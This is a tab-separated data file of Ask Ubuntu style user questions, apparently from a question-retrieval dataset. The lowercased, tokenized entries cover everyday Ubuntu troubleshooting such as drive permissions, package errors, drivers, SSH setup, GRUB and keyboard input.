318370	how do i remove permissions on an external drive in 13.04 ?	i have two old hard drives from my macbook that i would like to get usable files off of . the problem is i do n't have permission to access the files unless i do gksudo nautilus , which means i ca n't really use it , and i ca n't organize it on my new ubuntu-based laptop . i would like to be able to just use these files normally . i tried to go into the folder properties to see if i could change the permissions , but i got the following error message : myname @ mycomputersname : ~ $ gksudo nautilus initializing nautilus-dropbox 1.4.0 ** error : nautilus-properties-window.c:1836 : schedule_owner_change_timeout : assertion failed : ( nautilus_is_file ( file ) ) anyway , i would like to just remove the permissions from this drive if possible . there are other answers similar to this one but none deal with both mac drives and ubuntu 13.04 . update , i tried chmod and chown , neither worked and i got this message , repeated for every file in the drive . chmod : changing permissions of ‘folder/filename.id’ : read-only file system failed to change mode of ‘folder/filename.id’ from 0644 ( rw-r -- r -- ) to 0777 ( rwxrwxrwx )
318376	computer shuts off playing games	i just re-installed enemy territory after not playing for a year and can only play for 5 - 10 minutes and computer shuts off as if i unplugged it , no warning or freezing . press power button restart computer , no error messages or anything , starts normal and works fine . i installed urban terror and tried it same result . computer is on pretty much 24/7 , someone is usually on it most of the day and at night i have it performing other tasks , never any problems , i install all updates as they arrive . release 12.04 ( precise ) 32-bit , kernel linux 3.2.0-49-generic-pae , gnome 3.4.2 , memory:1.8 gb , processor : amd athlon ( tm ) ii x2 245 processor ă 2 geforce 6150se nforce 430 , nvidia driver version:295.49
318377	getting error after installing libgl-dev ?	i had tried to install libgl-dev , then i had this problem : e : could not get lock /var/lib/dpkg/lock - open ( 11 resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) searching for a ways to solve it in ubuntu forum i found this one : sudo rm /var/lib/dpkg/lock sudo rm /var/cache/apt/archives/lock i 've tried because everyone said that it works . i 've done installing again , and now another error : debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing man-db ( -- unpack ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : /var/cache/apt/archives/ttf-mscorefonts-installer_3.4+nmu1ubuntu1_all.deb man-db e : sub-process /usr/bin/dpkg returned an error code ( 1 ) what should i do with this error ?
318379	modem stopped working on ubuntu 12.10	i was using mts mblaze modem for ~9 days on ubuntu 12.10 . it was working fine . it stopped working all of a sudden . it works fine on windows . rfkill list shows that nothing is blocked . is there something else i need to check so that the question is more clear ? another detail , in case it helps : till yesterday , when i clicked 'on ' in the mobile broadband option , i would get a notification 'you are now registered on cdma.. ' . i do n't get that notification anymore . output of lsusb : bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 064e : e258 suyin corp . bus 002 device 013 : id 19d2 : fff1 zte wcdma technologies msm can someone please help me ?
318382	how can i adjust framebuffer or x screen relative position ?	a long time ago in a galaxy far , far away i had fixed boot screen using this nice solution . since that time i have been looking for the way to move framebuffer in virtual console slightly to the right and down , relatively to x screen position ( or vice-versa ) , because it is shown in wrong position , and part of symbols can not be seen . i reproduced look and feel of this problem using crop tool and fbgrab command : the grub menu also hides it 's left side behind the screen , but i do n't know how to make screenshot there without virtualbox ( and i doubt this screenshot will be useful ) . however , the main x screen shows itself on the correct place ( as it seems to me ) , and my monitor ( acer al1916 ) always autotunes to this position , even if virtual console is shown . i looked in many sources including askubuntu , but have found only one solution : switch from vga cable to dvi , which it is not acceptable , because my graphic card ( nvidia 6150se ) has only vga port onboard . i also found that fbset command can adjust screen parameters but need help for getting how does it work . here is the output of sudo fbset command : mode `` 1280x1024-77 '' # d : 131.096 mhz , h : 80.328 khz , v : 76.649 hz geometry 1280 1024 1280 1024 32 timings 7628 160 32 16 4 160 4 rgba 8/16,8/8,8/0,8/24 endmode upd : during reporting non-affected bug found one line that says : .proc.driver.nvidia.warnings.fbdev : your system is not currently configured to drive a vga console on the primary vga device . the nvidia linux graphics driver requires the use of a text-mode vga console . use of other console drivers including , but not limited to , vesafb , may result in corruption and stability problems , and is not supported . so , does anyone know how to adjust position of virtual console or x screen relatively to each other ?
318391	simple desktop program instantly closes	i wrote a simple .desktop program with accompanying script . it worked recently but seems to have stopped for no reason . it now just opens a terminal ( expected ) but instead of running the rest of the program it instantly closes the window . basically it opens then instantly closes the terminal window without running ( or so it seems ) any of the script . here is the code for both , the script first , then the .desktop file : # ! /bin/bash selection= until [ `` $ selection '' = `` enter '' ] ; do echo `` shutdown : c - cancel shutdown and quit enter - accept shutdown timer ( 3 hours ) and quit '' read selection echo `` '' case $ selection in [ cc ] ) exit ; ; `` '' ) echo `` shutting down ... 'sudo shutdown -c ' to cancel '' sleep 5 sudo shutdown -h 180 * ) echo `` please enter either c or press [ enter ] '' esac done here 's the desktop file : [ desktop entry ] name=shutdown script comment=shutdown in 3 hours exec= '' /home/nate/update-clean/shutdown script '' terminal=true type=application icon=/home/nate/update-clean/icons/computer-fail.png name [ en_us ] =shutdown how did it stop working ? ! ( also , if you had n't noticed , i want a simple script to shutdown the computer after a certain time . this is only the 2nd thing i 've written so if it has errors or you have constructive criticism , by all means ! ) thanks a ton ! edit : i added a simple `` exit ; ; '' to the script . could that have been all ? change : case $ selection in [ cc ] ) exit ; ; `` '' ) echo `` shutting down ... 'sudo shutdown -c ' to cancel '' sleep 5 sudo shutdown -h 180 exit ; ; * ) echo `` please enter either c or press [ enter ] ''
318392	upgraded to ubuntu 13.04 , osx mountain lion broken	i upgraded from 12.04 to 13.04 and now mountain lion just does n't boot . i had the latest refind installed but that does n't work any more . in grub i see osx but they do n't work . i tried starting in recovery and force boot mac with the keyboard short-cuts . nothing . appreciate any help .
318394	keyboard and mouse do not work during login	i 've never been able to input my password to my account because as soon as the ubuntu logo goes away , taking me to the login screen , the lights on my keyboard shut off and my keyboard and mouse become non responsive . many people have said to use terminal , well i do n't have access to that . i am able to use the command line when selecting ubuntu or ubuntu recovery mode ; the keyboard and mouse work fine then . please tell me what i need to do to get my mouse and keyboard working so i can enjoy my computer . thank you !
318395	installing ubuntu software offline	i have a rather unusual problem : i need to be able to download ubuntu software on an online machine , burn it on a disk , and install it on an offline machine . the software download needs to include all dependencies ( and the dependencies ' dependencies , and so on ) as the offline machine might not have them . in addition , the two machines might not run the same version of ubuntu ( for instance , the online machine might be running version 12 and the offline machine might be running version 13 ) . also , they might not have the same architecture ( one might be 32 bit and the other might be 64 bit ) . the method of downloading and installing the software could be anything - a python script , a batch script , a program , an existing software , whatever . any help with this issue would be most appreciated ( even hints and guesses as to the right direction ) .
318396	oss-compat package does not create /dev/dsp	as i understand it , the oss-compat package is supposed to enable alsa 's oss compatibility layer to create /dev/dsp files for your sound devices for compatibility with older applications . it 's description states : the purpose of this package is for applications that only support oss to depend on it , hence preventing common `` /dev/dsp not found '' errors that would confuse unexperienced users . yet after installing it , no /dev/dsp devices have been added to the system and older applications still have the same problems . other oss emulation instructions also did not work . i though it might have trouble as i have two sound devices ( a sound card and tv/fm tuner ) , but physically removing one device and restarting made no difference . i have also tried the aoss and padsp oss wrapper applications but without success ( works for applications not seeing /dev/mixer , but not those that require /dev/dsp ) .
318403	how to install realtek wireless drives	just incase i ' will give you this 02:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8191seva wireless lan controller [ 10ec:8171 ] ( rev 10 ) subsystem : hewlett-packard company device [ 103c:1467 ] kernel driver in use : rtl8192se 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 02 ) subsystem : hewlett-packard company device [ 103c:1605 ] kernel driver in use : r8169 so the main problem is my internet connection cuts out time from time but now i found out i need to install the driver for it . rtl81912 se . i have the file downloaded but i do n't know how to install it . if i am missing some information i will try to give out what i can . i just am tired of my internet connection cutting out from time to time . also whenever i move closer to the router it still sometimes cuts out too .
318405	shell script to check if something is plugged in the wifi usb port	i have a wifi access point that allows to plug a usb hard drive accessible from any computer sharing the same wifi . i would like to know if there was a way a shell script could test if something is plugged there or not . if there is a way to check which usb key or hard drive is plugged would be a delight , but i 'm not asking that much . edit the goal is to check if the drive is on before i can work with the files . i want to access the drive using samba . the ip is 192.168.0.1 . i can get the name of the drive , but the ip is fix , whichever drive i plug . note : my final goal is to upload files on that drive with a shell script . i do n't mind if you give me another way to do it : ssh , ftp , http , morse code , âś
318410	how to install app with run file in ubuntu 13.04	downloaded copy application ( dropbox alternative ) for linux https : //www.copy.com/install/ archive contains variant of gui binaries with .run file . i successfully executed it , but after reset os app does not auto-start with and i cant find it with search . i suppose that application needs to be installed somehow please advise how to install this application i am novice with linux so please make instructions as clear as possible .
318413	downloading older versions of ubuntu	i need to get ubuntu 10.04 version . where can i find it online ?
318418	should i download the 32-bit version or the 64-bit version of ubuntu ?	i have a 13 '' macbook pro 2010 . should i download the 32-bit version or the 64-bit version of ubuntu ?
318423	external hard drive drop/fall	i actually am having a problem for which i would really appreciate some advice . yesterday night my external 500gb ( usb ) hard drive ( a big one , with case ) fell . it was on my pc and fell down on the carpet . it was in its case of course but the cable was moved a bit and it fell on the carpet . i was using the hd at that time . i was watching a movie that was located on the hard drive . after the fall my computer does not recognize it . when i plug it in i can hear the sound of the hd ( which i guess means it gets power ) but it does not appear as an external hd . i used `` disks '' in ubuntu to see if the system can detect the hd and it appears in that application as a usb hd . i tried then to right click on the hd and `` create a disk image '' but i had no luck at all . i am sure that the hd can power on ( because of the sound ) and it is recognizable from ubuntu 's disks application and windows disk manager as well . my problem is that it 's not accessible . i have more than a lot of data stored on this hard drive . any ideas to save it ?
318426	canon ir c3380 driver	i need to configure a canon ir c3380 printer . i have not found drivers for it ( it says is not necessary ) . can you tell me which driver or protocol i must install ? thank you !
318427	how do i install winconn under ubuntu 13.04 ?	i can not install winconn under ubuntu 13.04 > sudo add-apt-repository ppa : realender/winconn [ sudo ] password for gvallver : vous allez ajouter le ppa suivant à votre système : winconn remoteapp connection manager plus d’info : https : //launchpad.net/~realender/+archive/winconn appuyez sur [ entrée ] pour continuer ou ctrl-c pour annuler l’ajout gpg : le porte-clefs « /tmp/tmpg8dqng/secring.gpg » a été créé gpg : le porte-clefs « /tmp/tmpg8dqng/pubring.gpg » a été créé gpg : demande de la clef 9cee05af sur le serveur hkp keyserver.ubuntu.com gpg : /tmp/tmpg8dqng/trustdb.gpg : base de confiance créée gpg : clef 9cee05af : clef publique « launchpad ppa for alex stanev » importée gpg : quantité totale traitée : 1 gpg : importées : 1 ( rsa : 1 ) ok # gvallver @ kiwi ~ > sudo apt-get update atteint http : //fr.archive.ubuntu.com raring release.gpg atteint http : //dl.google.com stable release.gpg ... ... 291 ko réceptionnés en 4s ( 62,2 ko/s ) w : impossible de récupérer http : //ppa.launchpad.net/realender/winconn/ubuntu/dists/raring/main/binary-amd64/packages 404 not found w : impossible de récupérer http : //ppa.launchpad.net/realender/winconn/ubuntu/dists/raring/main/binary-i386/packages 404 not found e : le téléchargement de quelques fichiers d'index a échoué , ils ont été ignorés , ou les anciens ont été utilisés à la place . on the website of winconn it is said that winconn is built for 12.04 and 12.10 . but is there a way to install it on 13.04 ?
318428	how to make hotspot in ubuntu ?	how to make wifi hotspot in ubuntu ? i am having connected with wifi internet and want to create wifi hotspot so that other devices gets connected with internet .
318436	is it possbile to load module compiled under kernel 2.6.x to a system with kernel 3.8.x	i have marvell usb wireless driver src which only supports up to kernel 2.6.8 . now my system is ubuntu 13.04 with kernel 3.8 and i can not compile the src under the new kernel anymore . i found the asm/system.h and the netlink.h changed in newer kernel . so i want to ask if i can compile the module under the 2.6.x kernel and then just copy the .ko file to the new system and load it ?
318439	drivers are support hp 630 notebook pc ?	i have 1 hp 630 notebook pc core i5 and want to install ubuntu can you suggest me to install any version to be the best driver support
318443	ca n't select cd disk to copy	i do not seem to be able to select the cd to copy from the combo-box on the copy disk dialogue window - i have tried with a mouse and keyboard but ca n't select the disk if there is only one item in the menu : ( any suggestions ?
318445	firefox goes slowly after i installed ubuntu update	i 'm a ubuntu 13.04 user , everything was good but software updater told me that there are new updates so i 'm installed all of the updates ( including firefox ) but after this update , my firefox goes so slowly & hangs up in seconds ! can i down date ! ( opposite of update ! ) my firefox ? if ok how ? i have a nightly ( a 64-bit beta version of firefox ) in windows 7 , i 'm using that for a long time & i think that was & is great , can i install nightly in ubuntu 13.04 ? again if ok how ? ( sorry for my bad english ) thanks ! for karel 's question i have : core i5 cpu , 4gb ram , 2gb vga ( nvidia )
318447	ssh to server , execute command , and maintain connection	i want to write a script that opens a terminal with different tabs , logon to a server using ssh in each tab and execute a command in each tab . for example : htop . the below script opens a terminal with 4 tabs all logged in on the server . but if i try to add the htop command in the cmd= line it does not work anymore ... # bin/bash tab= '' -- tab '' cmd= '' bash -c 'ssh user @ host ' ; bash '' foo= '' '' for i in 1 2 3 4 ; do foo+= ( $ tab -e `` $ cmd '' ) done gnome-terminal `` $ { foo [ @ ] } '' exit 0 i have tried this ... cmd= '' bash -c 'ssh user @ host htop ' ; bash '' ... because the ssh -- help says that the syntax for ssh is : usage : ssh [ user @ ] hostname [ command ]
318452	e : unable to find the package lx_lsqman	i was trying to install lx_lsqman ( bioinfo software ) wen got the error i have updated and upgraded and then tried to install the software still i get the error : e : unable to locate package .
318457	remove files file-manager without losing my personal folder	i am very unhappy with files , which replaced nautilus in 13.04 as the default file manager . how can i replace it with a better file manager without losing my personal folder ?
318459	publickey ssh login - only for unprivilieged accounts ?	general good-practice question : if i set up public key , passwordless authentication ( say , between laptop client and desktop server ... laptop may log in from home network , or out and about through the router port forwarding ) , is this best done for a non-superuser account ? this makes sense to me , as i could always `` su '' into an admin account after logging in , and should someone succeed in logging in unauthorized , they would have less privileges than a superuser ( i realize that the sudo password is still necessary for lots of things , even if logged in as superuser ... still would rather insulate the superuser 's 'user files ' ) . is this a good practice ? is there a good reason to log in remotely as superuser , or is it better to log in as a regular account and then `` su '' as needed ? should i make a user specifically for the purpose of ssh login ? another question : i 've installed openssh and edited the config to allow only a certain user , only rsa key authentication , changed default ports , etc ... is there a way to ensure that the vanilla-default ssh daemon is no longer running ? i 'm concerned its possible to be using some awesome openssh config , while the old default daemon is still accepting requests on good ol ' port 22 . does installing openssh sort of `` disengage '' the default daemon ? i guess the way my router is doing port forwarding , it should disallow forwarding of port 22 , but it would also be good to get each machine squared away as far as what ports its actually using ( not leaving unused services/ports open ) . final question : if there are multiple machines on my home network , and i might want to ssh into more than one of them ( and they are set to listen on different ports ) , is specifying router-ip : portnumber the only way to select between the machines ( the router has one external ip ) ? is this bad practice , and should i generally ssh into a `` gateway machine '' which then sshs into other machines ? i guess that way the router would have to only forward one port , and i could control access by specifying valid user accounts ? i 'm using ubuntu 12 and above , but i imagine the answers to these questions are not os-dependent .
318461	a third party repo against of a main one ? ! i want to install tor from its repository ?	installing tor from its repository , not from the universe ubuntu repository ! - > here is the instruction : https : //www.torproject.org/docs/debian ( i done ) but when i run sudo apt-get install tor , it is connected to ubuntu repository ! this installs the version which is located in ubuntu repositories ! i want the version which is in the below repository : deb http : //deb.torproject.org/torproject.org raring main
318462	where is the user 's profile picture stored in unity ?	i 'd like to be able to easily replace that picture without using the user interface , by simply copy/pasting it somewhere . so i 'd like to know where it is . on a side note , i 'm not 100 % sure this is related to unity or ubuntu ( i 'm using ubuntu 13.04 ) .
318464	error when compiling python 3.3.2	i downloaded python 3.3.2 on ubuntu 12.04 and i followed the instructions of readme to compile the files : ./configure make test make sudo make install but when i applying the command make i hold the following error : **fileexistserror : [ errno 17 ] file exists ( mode 775 ! = expected mode 755 ) : 'build/lib.linux-i686-3.3' make : *** [ pybuilddir.txt ] error 1** the 'build/lib.linux-i686-3.3 ' is a directory but i ca n't figure out to what file is refered that fileexistserror
318466	can not compile glasgow haskell compiler	./configure checking for gfind ... no checking for find ... /usr/bin/find checking for sort ... /usr/bin/sort checking for ghc ... no configure : error : ghc is required unless bootstrapping from .hc files . 256 i want to install glasgow haskell compiler , and ./configure asks for ghc . what kind of ghc is it asking for ? global hadron collider ? i downloaded the source from http : //www.haskell.org/ghc/download_ghc_7_6_3
318470	how to fresh install win7 under grub boot loader ?	i am new with linux and my laptop has ubuntu 12.10 and win7/64bit . grub boot loader makes me choose which to boot at startup . i want to clean re-install of win7 without changing configuration of grub and ubuntu . is it possible ? if possible please how ? thanks .
318477	will ubuntu 12.04 run on 128 mb of ram	i have a windows xp pc it has an intel celeron cpu and its about 700 mhz a19.1 gb hdd and 128 mb of ram what 's the most modern version of ubuntu that i can run
318478	how do i fix `` /bin/sh : 2 : patch : not found '' and `` make : *** [ lib/libcurl.a ] error 127 '' errors ?	curl-loader is a traffic generator . you can generate http , https , ftp etc . traffic with it . add to that , you can simulate multiple clients ( multiple source ip addresses ) . hereâs an explanation of how to install curl-loader on ubuntu 12.04 64bit box and generate http , https traffic . $ uname âr 3.2.0-39-generic $ tail -1 /etc/lsb-release distrib_description= '' ubuntu 12.04.2 lts '' install curl-loader download curl-loader from http : //curl-loader.sourceforge.net/ i downloaded curl-loader-0.56.tar.bz2 . extract bunzip2 curl-loader-0.56.tar.bz2 tar xvf curl-loader-0.56.tar cd curl-loader-0.56/ build requirements build it using general c development environment with bash , gcc ( 3 or 4 series ) , make , etc on a linux machine . building pre-requirements are : openssl binaries ; openssl development package with include files ( on debian package libssl-dev ) ; i have not installed libssl-dev , so i installed libssl-dev before compiling curl-loader . sudo apt-get install libssl-dev compile $ pwd /home/hattori/my_works/curl-loader-0.56 $ make [ ... ] /bin/sh : 2 : patch : not found '' and `` make : *** [ lib/libcurl.a ] error 127 how do i proceed from this error ?
318483	list files not originating from packages	many files are installed by packages on my file system . how could i list files that are not ? ie. , user created , like compiling software manually , writing documents . is there a way to list files that are from packages , but are changed ? to check what did i modified . this would be useful to me at a project to update custom-made images that are used internally . also , when re-installing at home and i forgot what i did . of course most interesting are outside the home dir , but changes in for example dot-configuration files in home are also interesting .
318484	upgrading ubuntu 12.04 from 32 to 64 bit	so i know this has been asked alot on this site , but i want to be a 100 % sure if i am doing it correct ( seeing as i do n't want to break my notebook or what not ) . i read several questions and i think i figured out how to do it , ( please note i only have 32 bit for a day , so i do n't have to be afraid of losing files ) : first i go to ubuntu.com . once there i 'll download the 64 bit version . i restart my computer and dual-boot to the 64-bit version . once i am in the 64-bit version i perform steps 3 to 5 of this question . am i correct ? or will my laptop fall apart if i attempt this ? i did the test described here , and yes my notebook is 64-bit compatible . i am totally new with ubuntu so please be gentle : )
318485	how to configure rsyslog to send file from specific program to specific location on remote server	i want to configure rsyslog on a centralised server so that all the logs of clients are stored at one place now the problem i 'm having is i dont know how to implement rsyslog so that it creates logs based on programmes on client machines i.e . like 'httpd ' etc . and save them in different files i.e . '/var/log/httpd.log ' and while it sends the log to the remote server the files should be saved like '/var/log/ip-address of host/httpd.log ' i have these two problems logs should be created on programme basis while logs are transmitted to remote server they should be stored on program basis with different directories for different hosts . i hope i made my question clear . please help . for creating log based on programme i believe i will have to use something like on client side if $ programname == 'httpd ' and $ syslogseverity < = '6 ' then /var/log/httpd.log if $ programname == 'httpd ' and $ syslogseverity < = '6 ' then ~ i also found this question but it does n't completely solves my problem how to configure rsyslog
318491	any way to mass auto indent php and html code in ubuntu ?	i have about 50~ poorly indented and very very hard to read to code . do you guys have any tips on how to indent this to make it more readable ?
318495	ca n't install jre ( java runtime enviornment ) in ubuntu 10.10 ?	i know my ubuntu 10.10 is no more supported . i want to install jaxodraw and for that i need to install jre ( java runtime enviornment ) . is there any way to install it manually ? please help .
318502	codeblocks permision denied after update from 12.10 to 13.04	when i try to compile it says sh : 1 : /media/user/linux/test/bin/debug/test : permission denied i did not have this problem with ubuntu 12.10 i have just started to use ubuntu so ... .
318506	ubuntu missing from boot menu	i recently dual booted windows 8 and ubuntu 13.04 , both uefi . when i boot , i get directly to windows 8 , without any prompt or boot menu/grub menu . to access ubuntu , i have to go to boot options by pressing f-12 while booting . how do i get the boot menu ?
318511	run shell commands from browser	i 'd like to access the terminal from firefox specifically . i only have access to firefox , i ca n't access terminal on its own .
318514	which version of ubuntu is compatible for compaq presario v2555us	please suggest me the ubuntu version suitable for compaq presario v2555us having specifications as ram:512mb , processor : amd sempron 1.8 ghz , hard drive:40gb
318515	unmet dependencies , linux-server depends : linux-headers-server , but boot is full	hello i have an problem with unmet dependencies , but i cant fix it . $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : linux-server : depends : linux-headers-server ( = 3.2.0.45.54 ) but 3.2.0.49.59 is installed e : unmet dependencies . try using -f. i tried : $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done ... ... .. dpkg : error processing /var/cache/apt/archives/linux-image-3.2.0-49-generic_3.2.0-49.75_amd64.deb ( -- unpack ) : failed in write on buffer copy for backend dpkg-deb during `./boot/vmlinuz-3.2.0-49-generic ' : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) i tried as well : $ sudo dpkg -- configure -a but does n't work cause no space left . so i tried to remove some linux-images , but : $ sudo apt-get purge linux-headers-3.2.0-37 linux-headers-3.2.0-37-generic linux-image-3.2.0-37-generic reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-server : depends : linux-headers-server ( = 3.2.0.45.54 ) but 3.2.0.49.59 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) can anyone help me ? //update : removed old linux-header-* and linux-images-* with dpkg , but : $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : linux-server the following packages will be upgraded : linux-server 1 upgraded , 0 newly installed , 0 to remove and 28 not upgraded . 1 not fully installed or removed . need to get 0 b/1,734 b of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of linux-server : linux-server depends on linux-image-server ( = 3.2.0.45.54 ) ; however : version of linux-image-server on system is 3.2.0.49.59. linux-server depends on linux-headers-server ( = 3.2.0.45.54 ) ; however : version of linux-headers-server on system is 3.2.0.49.59. dpkg : error processing linux-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : linux-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) //update 2 : fixed it by removing linux-server , linux-headers-server and linux-image-server .
318526	thunderbird exchange and gmail calendar merge	i have the following scenario : - an exchange corporate account configured on thunderbird - a google account ( calendar configured on thunderbird ) - ubuntu 12.04 - thunderbird the problem : - i have a gmail account to sync with my mobile phone , in the past , when i used to have windows on my corporate laptop , i used to have a useful application called `` google calendar sync '' that synchronizes ( merges ) the outlook calendar with google calendar . i 'd like to have something like this on my linux , as synchronizing ( merging ) it i can see all my meetings on my mobile . the workaround : - meanwhile i manually duplicate all corporate meetings to my google account for it to synchronize with the mobile , but it is so annoying , i 'd like this to be periodically and automatically made , as i had on `` google calendar sync '' . can someone help me ? thanks all in advance .
318530	generate md5 checksum for all files in a directory	i would like to create a md5 checksum list for all files in a directory . i want to cat filename | md5sum > ouptput.txt . i want to do this in 1 step for all files in my directory . any assistance would be great .
318531	grub error . ubuntu not loading ?	i have a dual boot system : windows 7 and ubuntu . i installed ubuntu without cd or usb . after a while , i got a problem using ubuntu . when i boot to ubuntu , i get a black background with `` grub > '' in the left . i tried to use different commands to fix it , but it does not work . can anybody help me to log in ?
318535	failing hard drive - root of all problems ?	so i have a question for those who are a little more clued up on this than myself . i have a laptop which is about 2 years old now and has been plaguing me with various issues for some time . the most common issues i get are overheating , complete halts , and random shutdowns . the difference between overheating shutdowns and random ones are that when it overheats , it shuts down telling me that it 's reached a critical temperature , whilst random is like someone pulled the power out and just goes pooof and off it is . at first i thought i might have bad ventilation , serious overheating on the cpu , ram and things like that . but i happened to stumble upon a small issue being mentioned on a hard drive test . over the last few days things went from bad to worse . for instance , last night i had booted the laptop from cold and opened the downloads folder ( which was slow , unresponsive and buggy for a few seconds ) and then opened a video file ( something i 've done 1000x without issues ) only this time i heard the startup music but the screen was blank , so trying to close the app , i discovered the laptop had completely frozen , no mouse movement and no response to any keyboard , so i was forced to do a restart . needless ton say , i 'm now doing a dd clone to another hard drive i have . i want to say before i actually ask the question , that i had opened up the laptop a few weeks ago and to my surprise saw nothing wrong at all , no dust , no hint of burn marks , everything looked completely in tact . my question is , if my harddrive is the problem and it 's starting to fail , can that also be responsible for heating issues ?
318536	ubintu 13.04 hangs after install and reboot	i installed ubuntu 13.04 on an empty 34gb partition from an usb stick . it installed ok , and after reboot , it booted gnome3 , had shown the gnome3 ui , and the mouse cursor . and then it hung immediately . no reaction to mouse events ; extremely slow reaction to numlock keyboard ( numlock led switches its state extremely slowly ) ; the hard disk led is switching on and off slowly . i waited a few dozens of minutes , no luck . how do i fix this problem ?
318537	how can automatically restart a ( vlc ) video stream ?	at work we have an `` camera pc '' which monitors an ipcam . i 'm using rtsp and vlc to display te stream on a monitor . however , the stream is eating up approximately 50gb a day so i edited the crontab to disable the eth0 interface between 17.00 and 8:30 . the problem is that vlc wo n't reconnect when the interface is back up in the morning and of course i want it to happen automatically.. i tried setting the camera settings lower , but vlc will only display a black screen . so if anybody has any suggestions , i 'm all ears.. tl ; dr : how can i set vlc to automatically reconnect a video stream ?
318538	build a project with qmake-qt4	i 'm new user of ubuntu , so excuse me if my question is very obvious . i have a 32-bit ubuntu 11.10 installed in virtualbox , and i want to build a project using qmake-qt4 , the problem is that i do n't have any knowledge about that , i 've searched in google but what i found is how to use a project file to generate another project file and a makefile , however i have all of this ( makefile , .pro file ) in the project package that i 've dowloaded , and the result that i got by typing directly make command is as follows : make : nothing to be done for `first' and if i use qmake-qt4 -project , qmake-qt4 , make : /usr/bin/qmake-qt4 -o makefile gate_pet_2_stir.pro g++ -c -pipe -o2 -wall -w -d_reentrant -dqt_webkit -dqt_no_debug -dqt_gui_lib -dqt_core_lib -dqt_shared -i/usr/share/qt4/mkspecs/linux-g++ -i . -i/usr/include/qt4/qtcore -i/usr/include/qt4/qtgui -i/usr/include/qt4 -i . -iinclude/qwt-6.0.2 -iinclude/root -iviewer -i . -i . -o viewer.o viewer/viewer.cpp in file included from viewer/viewer.cpp:1:0 : viewer/viewer.h:101:42 : error : ‘daq_project’ has not been declared viewer/viewer.h:103:17 : error : ‘daq_project’ has not been declared viewer/viewer.cpp:22:33 : error : ‘daq_project’ has not been declared viewer/viewer.cpp:22:1 : warning : unused parameter ‘_daq_project’ [ -wunused-parameter ] viewer/viewer.cpp : in member function ‘void viewer : :on_listwidget_clicked ( const qmodelindex & ) ’ : viewer/viewer.cpp:74:9 : error : ‘pr_data’ was not declared in this scope viewer/viewer.cpp:74:19 : error : ‘daq_project’ was not declared in this scope viewer/viewer.cpp : in member function ‘void viewer : :on_listwidget_2_clicked ( const qmodelindex & ) ’ : viewer/viewer.cpp:120:5 : error : ‘data_module’ was not declared in this scope viewer/viewer.cpp:120:18 : error : ‘pr_data’ was not declared in this scope viewer/viewer.cpp:124:19 : error : ‘daq_project’ was not declared in this scope viewer/viewer.cpp : at global scope : viewer/viewer.cpp:160:6 : warning : unused parameter ‘index’ [ -wunused-parameter ] viewer/viewer.cpp : in member function ‘void viewer : :on_listwidget_3_clicked ( const qmodelindex & ) ’ : viewer/viewer.cpp:169:5 : error : ‘data_module’ was not declared in this scope viewer/viewer.cpp:169:18 : error : ‘pr_data’ was not declared in this scope viewer/viewer.cpp:173:19 : error : ‘daq_project’ was not declared in this scope viewer/viewer.cpp : in member function ‘virtual void viewer : :closeevent ( qcloseevent* ) ’ : viewer/viewer.cpp:217:23 : error : ‘daq_project’ was not declared in this scope viewer/viewer.cpp : at global scope : viewer/viewer.cpp:215:6 : warning : unused parameter ‘event’ [ -wunused-parameter ] make : *** [ viewer.o ] error 1 so the question is what should i do ? hind
318540	erroneous character input	summary : with default install of 12.04lts on a dell xt2 the g key activates g5 , g % with uppercase . h and `` present the same issue . with xev i can see 4 codes for each physical keystroke of these keys , two for depress , two for release . all other keys send one code for depress and one for release , for a total of two codes . i think i 'm looking at a hardware issue , but it is the embedded keyboard . my question : how can force the kernel to ignore the extra codes that these three keys pass ? output : keypress event , serial 36 , synthetic no , window 0x5200001 , root 0xae , subw 0x0 , time 6806856 , ( 12,242 ) , root : ( 1113,294 ) , state 0x0 , keycode 42 ( keysym 0x67 , g ) , same_screen yes , xlookupstring gives 1 bytes : ( 67 ) `` g '' xmblookupstring gives 1 bytes : ( 67 ) `` g '' xfilterevent returns : false keypress event , serial 36 , synthetic no , window 0x5200001 , root 0xae , subw 0x0 , time 6806861 , ( 12,242 ) , root : ( 1113,294 ) , state 0x0 , keycode 14 ( keysym 0x35 , 5 ) , same_screen yes , xlookupstring gives 1 bytes : ( 35 ) `` 5 '' xmblookupstring gives 1 bytes : ( 35 ) `` 5 '' xfilterevent returns : false keyrelease event , serial 36 , synthetic no , window 0x5200001 , root 0xae , subw 0x0 , time 6806936 , ( 12,242 ) , root : ( 1113,294 ) , state 0x0 , keycode 42 ( keysym 0x67 , g ) , same_screen yes , xlookupstring gives 1 bytes : ( 67 ) `` g '' xfilterevent returns : false keyrelease event , serial 36 , synthetic no , window 0x5200001 , root 0xae , subw 0x0 , time 6806938 , ( 12,242 ) , root : ( 1113,294 ) , state 0x0 , keycode 14 ( keysym 0x35 , 5 ) , same_screen yes , xlookupstring gives 1 bytes : ( 35 ) `` 5 '' xfilterevent returns : false
